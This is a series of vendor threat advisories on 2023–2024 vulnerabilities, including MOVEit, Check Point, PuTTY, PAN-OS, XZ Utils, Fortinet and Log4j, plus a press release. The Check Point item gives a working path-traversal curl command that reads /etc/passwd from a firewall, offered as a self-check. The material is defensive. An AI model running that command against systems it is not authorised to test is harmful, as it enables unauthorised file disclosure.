maintaining a consistent user experience.  When a polyfill library is fetched from a CDN, the application depends on the integrity and security of the external server. If the CDN or the hosted library is compromised, as seen in the recent attack on cdn.polyfill[.]io, the compromised code can be injected and executed within the user's browser. This malicious code can redirect users to phishing sites, steal sensitive information, or spread malware and jeopardizes both endpoint and network security.   Tens of thousands of companies and organizations have been warned to stop using the service immediately. Those impacted include high-profile users Atlassian, Sendgrid, JSTOR, Intuit, the World Economic Forum, FlatIcon, SiteGround, and many government websites. Google has also sent warnings to those with landing pages affected by this attack.  Polyfill users were alerted in February about the potential for malicious activity and were advised to discontinue using the polyfill[.]io domain after its acquisition by Funnull, a Chinese company. After the sale, Andrew Betts, the developer of the open-source Polyfill project, urged users in a post on X to remove references to the content delivery network (CDN), partially because he never owned the site.  "I created the Polyfill service project, but I have never owned the domain name and I have had no influence over its sale," Betts wrote.   Recommended Actions for Polyfill.io Users  For those still utilizing the Polyfill.io service, there are several alternatives available. Here are some recommendations for transitioning away from this service:  Any site using cdn.polyfill.io should remove it immediately.  If you’re unsure whether you are using the service, the Polykill website, which has been monitoring this supply chain vulnerability, suggests that developers use a code search tool or IDE to look for instances of cdn.polyfill.io in source code across all projects within the organization.  If polyfills are still needed, both Fastly and Cloudflare offer reliable, drop-in alternatives.  Organizations can also opt to self-host the repository in a secure and controlled environment.  If you or your organization would like to shield Polyfill related traffic, please contact support@centripetal.ai.  Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.    Resources:  Polyfill.io supply chain attack hits 100,000+ websites — all you need to know Once benign Polyfill.io code now exposes 100k+ websites to attack Automatically replacing polyfill.io links with Cloudflare’s mirror for a safer Internet Polyfill supply chain attack embeds malware in JavaScript CDN assets --- ### [MOVEit Gateway and MOVEit Transfer Vulnerabilities](https://www.centripetal.ai/threat-research/moveit-gateway-and-moveit-transfer-vulnerabilities) Published: 2024-06-27 Summary: MOVEit Gateway and MOVEit Transfer vulnerabilities, CVE-2024-5805 and CVE-2024-5806, were officially identified on June 25, 2024. On June 25, 2024, Progress Software, the parent company of the MOVEit software suite, officially released details for two critical vulnerabilities identified in MOVEit Gateway and MOVEit Transfer, CVE-2024-5805 and CVE-2024-5806 respectively.   MOVEit Transfer is a managed file transfer solution that supports the exchange of files and data between servers, systems and applications within and between organizations. MOVEit Gateway is a proxy service that works in conjunction with MOVEit Transfer and allows hosting the MOVEit Transfer service on internal network while placing the Gateway within a DMZ to facilitate external access.   Both these vulnerabilities in MOVEit Gateway and MOVEit Transfer stem from improper authentication as implemented in the SFTP module which can lead to Authentication Bypass, in-turn leading to unauthorized access. CVE-2024-5805 was assigned a Base CVSS score of 9.1 earning a critical severity rating while CVE-2024-5806 was initially assigned a CVSS score of 7.4. On June 26, 2024, Progress Software updated their description for CVE-2024-5806 stating “A newly identified vulnerability in a third-party component used in MOVEit Transfer elevates the risk of the original issue mentioned above if left unpatched.” Consequently, the CVSS score was elevated to a matching critical score of 9.1.  The newly identified vulnerability is likely in reference to a vulnerability found in IPWorks SSH, a server library utilized by the MOVEit software suite to handle key pair authentication and other lower-level SSH operations. A writeup from WatchTowr Labs states that the original identified vulnerability in MOVEit Transfer, “arises from the interplay between MOVEit and IPWorks SSH, and a failure to handle an error condition.”  The following versions of MOVEit Transfer are vulnerable to CVE-2024-5806:   From 2023.0.0 before 2023.0.11  From 2023.1.0 before 2023.1.6  From 2024.0.0 before 2024.0.2  The following versions of MOVEit Gateway are vulnerable to CVE-2024-5805:  2024.0.0  From testing, Rapid 7 identified the following three criteria required for successful authentication bypass exploiting CVE-2024-5806: “that attackers have knowledge of an existing username, that the target account can authenticate remotely, and that the SFTP service is exposed.”  The Shadowserver Foundation reports that active attempts to exploit CVE-2024-5806 have been observed in the wild following the publication of the aforementioned writeup by WatchTowr Labs. Censys also reports ~2,700 instances of MOVEit Transfers are present online, primarily within the United States, U.K., and Germany. Given the widespread abuse of another critical MOVEit Transfer vulnerability (CVE-2023-34362, CVSS score: 9.8) in a series of Cl0p ransomware attacks last year, it is crucial for users to promptly update to the latest versions.  Progress Software has released patches to address these vulnerabilities in MOVEit Transfer and MOVEit Gateway. They strongly recommend upgrading to the latest patched versions of MOVEit Transfer 2023.0.11, 2023.1.6, and 2024.0.2 immediately. To address the Vulnerability present in MOVEit Gateway, they recommend upgrading to 2024.0.1.  Following the identification of the “Third Party Vulnerability”, Progress Software has also recommended blocking all “public inbound RDP access to MOVEit Transfer server(s)” as well as limiting “outbound access to only known trusted endpoints from MOVEit Transfer server(s)”.  Progress Software also notes that “For customers on MOVEit Cloud, no further action is needed as the MOVEit Transfer patch has already been deployed to MOVEit Cloud.”  Centripetal’s CleanINTERNET® can assist in detecting unauthorized connections or exploit attempts provided any MOVEit Appliances are seated behind a RuleGATE device.    If you currently use either MOVEit Transfer or MOVEit Gateway, please contact support@centripetal.ai.   Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.     Resources:  MOVEit Gateway Critical Security Alert Bulletin MOVEit Transfer Critical Security Alert Bulletin Vulnerability Details : CVE-2024-5805 Vulnerability Details : CVE-2024-5806 Auth. Bypass In (Un)Limited Scenarios - Progress MOVEit Transfer (CVE-2024-5806) MOVEit Transfer: Auth bypass and a look at exposure MOVEit Exposure Tracker X: The Shadowserver Foundation Authentication Bypasses in MOVEit Transfer and MOVEit Gateway   --- ### [Check Point Vulnerability: CVE-2024-24919](https://www.centripetal.ai/threat-research/check-point-vulnerability-cve-2024-24919) Published: 2024-06-03 Summary: Centripetal CleanINTERNET turns Threat Intelligence into Threat Operations, shielding your business from 99% of global cyber attacks.On May 28, 2024, Check Point released an advisory for… On May 28, 2024, Check Point released an advisory for CVE-2024-24919, a high priority bug which according to NIST NVD is categorized as “Exposure of Sensitive Information to an Unauthorized Actor”. The NVD has yet to assess a CVSS score for CVE-2024-24919 as of this writing. This vulnerability affects Check Point Security Gateway devices connected to the internet and configured with either IP-Sec VPN or Mobile Access software blades. When exploited, this vulnerability provides the attacker the ability to enumerate and extract password hashes for local accounts, including Active Directory service accounts, which can lead to lateral movement and complete compromise of targeted networks under the right conditions.  Check Point stated on May 31, 2024, that exploitation attempts have been ongoing since April 7, 2024. They have also observed attackers extracting the ntds.dit file from the Active Directory servers belonging to compromised organizations. The ntds.dit file is a database file that stores active directory data including users, groups, security descriptors and password hashes.  Vulnerable Systems and Circumstances:  According to the vendor advisory, the following products are vulnerable to CVE-2024-24919:  CloudGuard Network  Quantum Maestro  Quantum Scalable Chassis  Quantum Security Gateways  Quantum Spark Appliances  Check Point has advised that a Security Gateway is vulnerable if one of the following configurations is applied:  If the IPSec VPN blade has been enabled and the Security Gateway device is part of the Remote Access VPN community.  If the Mobile Access blade has been enabled.   There are manufacturer provided hotfixes available as outlined in the vendor advisory. Check Point advises that these hotfixes be applied immediately, and environments be evaluated to ensure that other circumstances regarding network security practices do not add to the vulnerability of systems. For example, systems that rely on password-only authentication should switch to certificate-based authentication where possible.  Important extra measures to take:  Change the password of the LDAP Account Unit  Reset password of local accounts connecting to Remote Access VPN with password-only authentication  Prevent Local Accounts from connecting to VPN with Password-Only Authentication  Renew the server certificates for the Inbound HTTPS Inspection on the Security Gateway  Renew the certificate for the Outbound HTTPS Inspection on the Security Gateway  Reset Gaia OS passwords for all local users  Regenerate the SSH local user certificate on the Security Gateway in the following case:  Renew the certificate for the SSH Inspection”  Centripetal’s CleanINTERNET® can assist in detecting unauthorized connection attempts and successful logins provided the Check Point products are seated behind a RuleGate device. This, along with actions recommended by the vendor, can avoid a full compromise of network infrastructure due to CVE-2024-24919.  If you are unsure if your devices are vulnerable, you can run the following command directed at your Check Point Firewall IP to find out:   curl -d "aCSHELL/../../../../../../../etc/passwd" -k -X POST https://<YOUR CHECKPOINT FIREWALL IP HERE>/clients/MyCRL   If you are currently running one of the affected products, please contact support@centripetal.ai.   Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.   Resources:  https://nvd.nist.gov/vuln/detail/CVE-2024-24919  https://medium.com/@verylazytech/cve-2024-24919-poc-bfd6508829bc  https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/  https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/#/  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24919  https://www.helpnetsecurity.com/2024/05/31/cve-2024-24919/  https://censys.com/cve-2024-24919/  --- ### [PuTTY Vulnerability: CVE-2024-31497](https://www.centripetal.ai/threat-research/putty-vulnerability-cve-2024-31497) Published: 2024-04-19 Summary: On April 15th, Fabian Bäumer and Marcus Brinkmann of Ruhr University Bochum disclosed that PuTTY, had a vulnerability that can allow an attacker to compromise private keys, then forge signatures, and… On April 15th, Fabian Bäumer and Marcus Brinkmann of Ruhr University Bochum disclosed that PuTTY had a vulnerability that can allow an attacker to compromise private keys, then forge signatures, and log into any remote servers on which those keys are used. PuTTY is a free and open-source terminal emulator, serial console and network file transfer application that supports several network protocols, including SCP, SSH, Telnet, rlogin, serial port and raw socket connections. To fix this vulnerability, PuTTY's developers switched to the RFC 6979 technique (the use of the message itself and the private key value to a deterministic random key generation process using a pseudo-random function), for all DSA and ECDSA key types. EdDSA keys such as Ed25519 already used a different system, which has not changed. However, this doesn't affect the fact that information about existing P521 private keys has already been leaked whenever a signature was generated using the old key generator. At a user level, all NIST P-521 client keys used with PuTTY must be considered compromised, given that the attack can be carried out even after the root cause has been fixed in the source code.  This security flaw affects PuTTY version 0.68 through 0.80 and would facilitate remote attackers to recover NIST P-521 private keys by exploiting biased ECDSA nonces generated by the PuTTY client and its components. Specifically, the flaw lies in the generation of heavily biased ECDSA nonces for NIST P-521, where the first 9 bits are consistently zero.   Elliptic Curve Digital Signature Algorithm (ECDSA), for context, is a cryptographic signing algorithm. It fulfills a similar role to RSA for message signing – an ECDSA public and private key pair are generated, and signatures generated with the private key can be validated using the public key. In addition, ordinarily nonce generation uses cryptographically secure pseudorandom number generator (CSPRNG) however, due to PuTTY’s development being pre-CSPRNG API deployment included in the delivery of Windows XP it’s developers used an alternative nonce generation scheme where the SHA512 is used to generate a 512-bit number based on the private key and the message.  The bias identified facilitates the full recovery of the secret key using advanced techniques, requiring only around 60 signatures. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures made through an agent-forwarding mechanism.  Potential Attacks:  - An attacker who performs an active man-in-the-middle attack (e.g. via DNS spoofing) to redirect the user to a malicious SSH server would be able to capture signatures in order to exploit this vulnerability if the user ignores the SSH key fingerprint change warning.  - An attacker who compromised an SSH server could also use it to capture signatures to exploit this vulnerability, then recover the user’s private key in order to compromise other systems.  - An attacker can use PuTTY for git+ssh, which is a way of interacting with a git repository over SSH. PuTTY is commonly used as an SSH client by development tools that support git+ssh. Users can digitally sign git commits with their SSH key, and these signatures are published alongside the commit as a way of authenticating that the commit was made by that user. These commit logs are publicly available on the internet, alongside the user’s public key, so an attacker could search for git repositories with P-521 ECDSA commit signatures. If those signatures were generated by a vulnerable version of PuTTY, the user’s private key could be compromised and used to compromise the server or make fraudulent signed commits under that user’s identity.  Luckily, signatures are not exposed to passive eavesdroppers of SSH connections.   P-521 keys that have ever been used with any of the following software should be treated as compromised:  - PuTTY 0.68 – 0.80  - WinSCP 5.9.5 – 6.3.2  - TortoiseGit 2.4.0.2 – 2.15.0  - TortoiseSVN 1.10.0 – 1.14.6  - Or if a P-521 key has ever been used for git commit signing with development tools on Windows  Centripetal’s CleanINTERNET® can help monitor and shield unexpected SSH connections to potentially malicious hosts.  Resources: Vulnerability Details: CVE-2024-31497 - CVEdetails.com Openwall.com CVE-2024-31497 - National Vulnerability Database PuTTY vulnerability vuln-p521-bias - chiark.greenend.org.uk CVE-2024-31497 - MITRE Flaw in PuTTY P-521 ECDSA signature generation links SSH private keys - LRQA Nettitude Labs Crazy Crypto: Meet CVE-2024-31496 - Medium   --- ### [Palo Alto Networks Vulnerability: CVE-2024-3400](https://www.centripetal.ai/threat-research/palo-alto-networks-vulnerability-cve-2024-3400) Published: 2024-04-15 Summary: On April 12th, Palo Alto Networks released a CVE advisory for CVE-2024-3400, a critical vulnerability identified in the GlobalProtect Gateway feature of PAN-OS, the operating system for Palo Alto… On April 12th, Palo Alto Networks released a CVE advisory for CVE-2024-3400, a critical vulnerability identified in the GlobalProtect Gateway feature of PAN-OS, the operating system for Palo Alto Networks firewalls. This command injection vulnerability allows unauthenticated attackers to execute arbitrary commands with root privileges on the affected devices. Due to the low attack complexity requirements and lack of initial privileges required, a CVSS score of 10/10 has been assigned reflecting its the highest level of severity and its potential impact.  This vulnerability specifically affects PAN-OS versions 10.2, 11.0, and 11.1 when both the GlobalProtect gateway and device telemetry features are enabled. Fixes for these versions are in development and are estimated to be released on April 14th, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.  Immediate actions recommended by Palo Alto Networks include applying a Threat Prevention update with Threat ID 95187, which blocks the attack vectors for this vulnerability. Users are urged to monitor and apply forthcoming patches scheduled for release by April 14, 2024, to fully address the vulnerability in PAN-OS versions 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3. Until these patches are applied, customers are advised to disable device telemetry if it is not critical to their operations.  Palo Alto Networks and CISA have confirmed limited but active exploitation in the wild with multiple POC Exploits scripts becoming publicly available on April 12th.  Volexity, as detailed in their blog post, first identified zero-day exploitation of CVE-2024-3400 on April 10th, 2024 executed by the threat actor UTA0218 which was able to remotely exploit a Palo Alto Firewall, create a reverse shell, and move laterally across the environment. Volexity’s investigation further revealed successful exploitation of this vulnerability by UTA0218 across multiple organizations dating back to March 26th, 2024.   Volexity notes that “The tradecraft and speed employed by the attacker (UTA0218) suggests a highly capable threat actor with a clear playbook of what to access to further their objectives.” Based on their analysis, Volexity “assesses that it is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type of victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access victim networks.”     Nessus has released detection for CVE-2024-3400 via Nessus Plugin ID 193255.    The discovery of CVE-2024-3400 shows that threat actors are continuing to target edge devices and underscores the importance of rigorous network security practices, including monitoring of network defense mechanisms to protect against potential unauthorized access and system compromises, and vulnerability management through active scans.    The CleanINTERNET solution continues to utilize threat intelligence to protect against the stages of the attackers kill chain from Reconnaissance and identification of vulnerable targets, to Delivery and establishing persistence, and Command and Control. Centripetal expects a sharp increase in observed Cyber Threat Intelligence indicators related to the exploitation of CVE-2024-3400 in the coming days as threat actors race to exploit this vulnerability before the window of opportunity to do so closes.  If you are currently running one of the affected versions of PAN-OS, please contact support@centripetal.ai.  Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.    --- ### [XZ Utils Vulnerability: CVE-2024-3094](https://www.centripetal.ai/threat-research/xz-utils-vulnerability-cve-2024-3094) Published: 2024-04-01 Summary: On March 28th, Red Hat released an advisory for CVE-2024-3094 which is a critical vulnerability identified in XZ Utils - a widely used data compression software included in many Linux distributions.… On March 28th, Red Hat released an advisory for CVE-2024-3094 which is a critical vulnerability identified in XZ Utils - a widely used data compression software included in many Linux distributions. This vulnerability stems from a backdoor inserted in versions 5.6.0 and 5.6.1 of XZ Utils and has been given a CVSS score of 10 out of 10, indicating its severity as critical. The malicious code discovered in these versions of XZ Utils interferes with the authentication process, potentially allowing unauthorized remote system access. The compromised versions were distributed in testing and some stable versions of various Linux distributions, including Fedora Linux 40 beta, Fedora Rawhide, openSUSE Tumbleweed, openSUSE MicroOS and Debian's testing, unstable, and experimental versions. Additionally, users of Kali Linux that have updated their installation between March 26th to March 29th are affected, as well as some Arch Linux virtual machine and container images, and an installation medium contained the affected XZ versions.  Immediate recommendations include downgrading XZ Utils to a non-compromised version, specifically version 5.4.6, which is believed to be unaffected. Users and administrators should also monitor and apply updates from their respective Linux distribution providers to ensure they are not vulnerable to this backdoor exploit. Additionally, it is recommended to check for any sensitive information or sensitive keys on the affected machines and rotate any credentials found on the machine, or related to the machine.  To determine if a host is running a vulnerable version of XZ, a user can run the following command: strings `which xz` | grep '5\.6\.' Any result including 5.6.0 or 5.6.1 indicates that the host may be vulnerable, and an update of the library should be prioritized.   The discovery of CVE-2024-3094 highlights the importance of vigilant software supply chain security, and the need for rapid response and mitigation actions to protect against potential unauthorized access and system compromises. CleanINTERNET® utilizes threat intelligence proactively to protect against reconnaissance.  Without such protection, attackers can rapidly index and launch attacks on known vulnerable targets.  If you are currently running an affected version of XZ Utils please contact support@centripetal.ai.    Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.   --- ### [ConnectWise Vulnerability: Authentication Bypass in ScreenConnect](https://www.centripetal.ai/threat-research/connectwise-vulnerability-cwe-288-and-cwe-22) Published: 2024-02-21 Summary: On February 19th, ConnectWise disclosed a vulnerability in their ScreenConnect software versions 23.9.7 and earlier. There is no indication of current exploitation in the wild.  UPDATE: February 23rd, 2024 The following CVEs have been assigned to the ConnectWise Vulnerability:  CVE-2024-1709 (CVSS: 10): Authentication Bypass POC by Horizion3ai on GitHub  CVE-2024-1708 (CVSS: 8.4): Path Traversal  Widespread exploitation of these vulnerabilities in the wild has been confirmed including comprise of UnitedHealth's Change Healthcare on February 22nd, by Lockbit. Sophos has confirmed various strains of malware using these vulnerabilities as part of delivery including LockBit ransomware, AsyncRAT, infostealers, etc.  It is Centripetal’s assessment that threat actors currently are actively targeting these vulnerabilities due to the ability to directly achieve Remote Code Execution and organizations should patch any exposed instances of ConnectWise as soon as possible. February 20th, 2024 On February 19th, ConnectWise disclosed a vulnerability in their ScreenConnect software versions 23.9.7 and earlier.  This particular critical severity vulnerability, results in the reading of sensitive configuration files, access to and modification of application source code, and Remote Code Execution capabilities by an attacker.  Additional path traversal risks exist. There is no indication of current exploitation in the wild.  If you are a current ConnectWise ScreenConnect customer utilizing the cloud solution, the software has already been upgraded and no action is required. For users who are using an on-premises solution, ConnectWise has issued a patch as well as a full upgrade document which can be found here. While no known threat actors are known to be actively exploiting this vulnerability in the wild or that a proof-of-concept exists, the CleanINTERNET® solution continues to utilize threat intelligence to protect against reconnaissance which would allow an attacker to rapidly index and launch attacks on known vulnerable targets. At the time of this writing, no CVE has been assigned to the vulnerability. If you are a current client of ConnectWise please contact support@centripetal.ai. Centripetal is pleased to offer penetration testing and vulnerability assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. --- ### [Fortinet Vulnerability: CVE-2024-21762](https://www.centripetal.ai/threat-research/fortinet-cve-2024-21762) Published: 2024-02-09 On Thursday, February 8th, the Fortinet Product Security Incident Response Team released an advisory (FG-IR-24-015) notifying of an out-of-bound write vulnerability in their SSL VPN tracked as CVE-2024-21762. The vulnerability "may allow a remote unauthenticated attacker to execute arbitrary code or command via specially crafted HTTP requests”. This is concerning as there are estimates of over 490,000 Fortinet SSL VPN appliances on the internet which by design, are on the edge of customer networks.   Fortinet has advised that the vulnerability is being “potentially exploited in the wild” but, at this time have not provided any further information. This comes only a day after a Fortinet blog entry deep diving into the exploitation of previously disclosed Fortinet vulnerabilities using techniques indicative of nation state actors.   Vulnerability Workaround: Disable SSL VPN (Note: disable webmode is NOT a valid workaround)  Vulnerability Remediation:    Version  Affected  Solution  FortiOS 7.6  Not affected  Not Applicable  FortiOS 7.4  7.4.0 through 7.4.2  Upgrade to 7.4.3 or above  FortiOS 7.2  7.2.0 through 7.2.6  Upgrade to 7.2.7 or above  FortiOS 7.0  7.0.0 through 7.0.13  Upgrade to 7.0.14 or above  FortiOS 6.4  6.4.0 through 6.4.14  Upgrade to 6.4.15 or above  FortiOS 6.2  6.2.0 through 6.2.15  Upgrade to 6.2.16 or above  FortiOS 6.0  6.0 all versions  Migrate to a fixed release  If you are a current Fortinet customer, CleanINTERNET® will continue to provide dynamic threat intelligence based protection against known indicators of compromise, limiting threat actors ability to attack.  Additional shielding opportunities may become available depending on observed network traffic.   If you are a current client of Fortinet please contact support@centripetal.ai.   Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.   --- ### [AnyDesk Production Systems Breach](https://www.centripetal.ai/threat-research/anydesk-production-breach) Published: 2024-02-06 Summary: If you are a current AnyDesk customer, Centripetal’s CleanINTERNET will continue to provide dynamic threat intelligence based protection against known indicators of compromise. On February 2nd, 2024, AnyDesk disclosed that their production systems had been compromised and that private code signing keys and source code were stolen, while an unknown number of user accounts had their passwords reset. This is a significant concern, as it would allow a malicious attacker to generate malicious versions of AnyDesk software with compromised code that appears to be legitimate. It is assessed that approximately 18,000 credentials are available for sale on the Dark Web as a result. As a result, AnyDesk followed through with a prepared emergency response plan, revoked compromised certificates, and has since issued an update that is available to customers. The vendor recommendation at this time is to update the software. Additional protection measures include monitoring devices known to be using AnyDesk software, whitelisting using the AnyDesk ID system, enabling multi-factor authentication, and password rotation on impacted accounts. If you are a current AnyDesk customer, Centripetal’s CleanINTERNET® will continue to provide dynamic threat intelligence-based protection against known indicators of compromise, limiting threat actor’s ability to attack. Additional shielding opportunities may become available depending on observed network traffic. Our intelligence operations analysts are actively searching for potential exploitation attempts as a result of this breach. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. --- ### [Cisco iOS XE Vulnerability: CVE-2023-20198](https://www.centripetal.ai/threat-research/shielding-against-cve-2023-20198) Published: 2023-10-17 Summary: Cisco has recently released an advisory regarding an actively exploited, previously unknown vulnerability, tracked as CVE-2023-20198. Cisco has released an advisory, acknowledging active exploitation of a previously unknown vulnerability, which is tracked as CVE-2023-20198, in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access, which is the highest level of access. It provides full access to all commands including the ability to make configuration changes. The attacker can then use that account to gain control of the affected system. Cisco has stated that this zero-day vulnerability has been exploited by unknown threat actors in the wild since at least September 18th, 2023. Vulnerable Products Any switch, router, or wireless LAN controller running IOS XE that has the HTTP or HTTPS Server feature enabled and exposed to the internet is vulnerable. To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. If either command is present, the HTTP Server feature is enabled for the system. Recommendations Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature. While there are minimal Indicators of Compromise (IOCs) currently associated with this vulnerability, Centripetal is currently tracking IOCs and deploying them directly to the RuleGATE for immediate shielding as they become available. If you are a current user of Cisco IOS XE, please contact support@centripetal.ai. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centrpetal.ai or reach out to your Centripetal Account Representative. --- ### [Shielding Against the Most Recent Fortinet Vulnerability](https://www.centripetal.ai/threat-research/shielding-against-cve-2023-27997) Published: 2023-06-13 Summary: Charles Fol and Dany Bach from LEXFO, discovered a heap overflow bug in Fortigate’s SSL VPN that can be exploited, now known as CVE-2023-27997, a Fortinet vulnerability. During a red team assessment for a client, Charles Fol and Dany Bach from LEXFO, discovered a heap overflow bug in Fortigate’s SSL VPN that can be exploited to achieve remote code execution on Fortigate instances. This vulnerability is reachable without authentication, and can be used to execute arbitrary code on vulnerable systems, which could lead to a complete compromise of the system.  On June 13th, CVE-2023-27997 was assigned to this vulnerability with a Critical CVSS of 9.2. The heap overflow bug is located directly on the web interface that allows users to authenticate to the VPN. Only the specific versions listed below are impacted by this bug. CVE-2023-27997 follows a long string of Fortinet vulnerabilities disclosed since January 2023 with CVE-2022-42475.  Affected Products  FortiOS-6K7K version 7.0.10  FortiProxy version 7.2.0 through 7.2.3   FortiOS version 7.2.0 through 7.2.4   FortiOS-6K7K version 7.0.5   FortiProxy version 7.0.0 through 7.0.9    FortiOS-6K7K version 6.4.12  FortiProxy version 2.0.0 through 2.0.12   FortiOS version 7.0.0 through 7.0.11   FortiOS-6K7K version 6.4.10  FortiProxy 1.2 all versions   FortiOS version 6.4.0 through 6.4.12   FortiOS-6K7K version 6.4.8  FortiProxy 1.1 all versions   FortiOS version 6.2.0 through 6.2.13   FortiOS-6K7K version 6.4.6    FortiOS version 6.0.0 through 6.0.16   FortiOS-6K7K version 6.4.2      FortiOS-6K7K version 6.2.9 through 6.2.13      FortiOS-6K7K version 6.2.6 through 6.2.7      FortiOS-6K7K version 6.2.4      FortiOS-6K7K version 6.0.12 through 6.0.16      FortiOS-6K7K version 6.0.10       With Fortinet flaws emerging as a lucrative attack vector for threat actors in recent years, Fortigate customers are advised to update their firmware to the latest version as soon as possible. There have not been reports of this specific vulnerability being widely exploited, however we do expect threat actors to leverage this vulnerability soon as there are more than 210,000 devices with the Fortigate SSL VPN exposed to the Internet as of June 12th.  As of June 13, there are no known network IOCs specific to exploitation of this vulnerability.  If upgrading to the latest firmware is not possible immediately, customers are advised to immediately disable SSL-VPN until such a time that upgrading is possible.  If you are a current Centripetal and FortiGate client, please contact support@centripetal.ai.  Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact us.   --- ### [Shielding Against CVE-2021-44228 IOCs](https://www.centripetal.ai/threat-research/cleaninternet-shielding-against-cve-2021-44228-iocs) Published: 2021-12-09 Summary: Since the release of an initial proof of concept for CVE-2021-44228, Centripetal has witnessed an uptick in reconnaissance-based scanning. On December 9th, the CVE-2021-44228 Apache Log4j RCE was released publicly. Before the threats were made public, Centripetal CleanINTERNET shielded this threat proactively and saved our customers valuable time, reputation, and the risk of non-compliance by preventing any compromise associated with this vulnerability. Many organizations are likely to be impacted by this vulnerability without understanding why or how. CleanINTERNET shields 99% of attacks and delivers enterprise-class cyber security to all organizations regardless of size or industry.  Since the release of an initial proof of concept for CVE-2021-44228, Centripetal has witnessed an uptick in reconnaissance-based scanning for this new vulnerability. Log4j is a Java based logging utility used by a variety of applications due to its extensibility and ability to output data in standardized formats.  It is often included with other applications or devices for use through a localized API. The vulnerability can operate due to improper input validation, which when ingested may result in Remote Code Execution, allowing for an attacker to perform actions and commands on the vulnerable machine.  Some common attackers are installing trojans, cryptocurrency miners, Cobalt Strike beacons and establishing remote shells for manual access. Software vendors who utilize Log4j have begun posting security bulletins notifying clients of their own vulnerability status, and a large number of them have been consolidated into this GitHub Gist.  Several tools exist to scan logs for exploitation attempts.  Both FoxIT SRT and EmergingThreats by ProofPoint have released IDS rules to identify exploitation attempts. --- ## Press ### [Half a Million Vulnerabilities Leave Irish Businesses Exposed to Cybercriminals](https://www.centripetal.ai/company/press/half-a-million-vulnerabilities-leave-irish-businesses-exposed-to-cybercriminals) Published: 2025-10-09 Summary: Unlocking Unmatched Processing Power for Community-Driven Cyber Defense Centripetal, the global leader in cybersecurity threat intelligence, today exposed critical security gaps leaving hundreds of thousands of Irish networks vulnerable to cyberattack.Using its proprietary threat intelligence analytics platform, Centripetal has mapped cyberattack entry points across Ireland down to individual IP addresses and networks, revealing which regions, industries, and organizations face the greatest risk.The findings are stark:349,000 Irish networks (3.6% of the total) remain unprotected from active cyber threats44% have exposed vulnerabilitiesHalf a million vulnerabilities exist on exposed assets across Ireland as of September 2025Dublin faces the highest risk, recording the greatest concentration of vulnerabilities across all industriesCentripetal's Attack Surface Map identifies specific attack vectors—the methods cybercriminals use to exploit vulnerabilities and gain unauthorized access to systems, networks, and sensitive data. This granular visibility enables organizations to understand their exact exposure and take immediate action.The threat is active and escalating:63% of compromised networks are leveraged to conduct active reconnaissance—attackers are probing systems and planning their strikes through Irish infrastructure11% are acting as command-and-control centers to coordinate attacks—cybercriminals have already infiltrated these systems and are working to further seize control of other target networks35% increase in active attacks launched or coordinated through Irish networks since 2024 - the scale of attacks has expanded dramatically as cybercriminals automate campaigns and target vastly more organizations simultaneously by leveraging sophisticated tools and technologies including AI.This means thousands of Irish organizations are likely under attack right now, many without knowing it.David Silke, Managing Director, Centripetal Ireland says, "Across Ireland, we can see that there are Critical National Infrastructure organisations that are currently exposed to attack vectors. We can see that the largest attack vector in Ireland at present are the ISPs (Internet service providers – the telecoms and hosting providers). Our technology can drill down to a granular level to show which customers of a particular provider are affected by these vulnerabilities at a street level."We're calling for organisations in Ireland to review their cybersecurity provision and asking them to put more emphasis on the use of threat intelligence to protect themselves. We know that only 20% of organisations currently do this. At Centripetal, our technology effectively cloaks these vulnerabilities, hiding them from attackers so they can't be targeted," says Silke.CleanINTERNET, including its new Fusion product, blocks 99.99% of threats by providing complete network visibility. Unlike traditional solutions that only monitor traffic entering and leaving the network (north-south), Fusion also monitors internal traffic flows (east-west), creating comprehensive protection from every angle.This dual capability means organizations can now:Stop external threats before they breach the networkDetect insider threats by identifying suspicious behavior from internal users and systemsReceive real-time alerts when unusual activity occurs, whether from outside attackers or internal sourcesAbout CentripetalCentripetal delivers the most advanced and proactive network defense 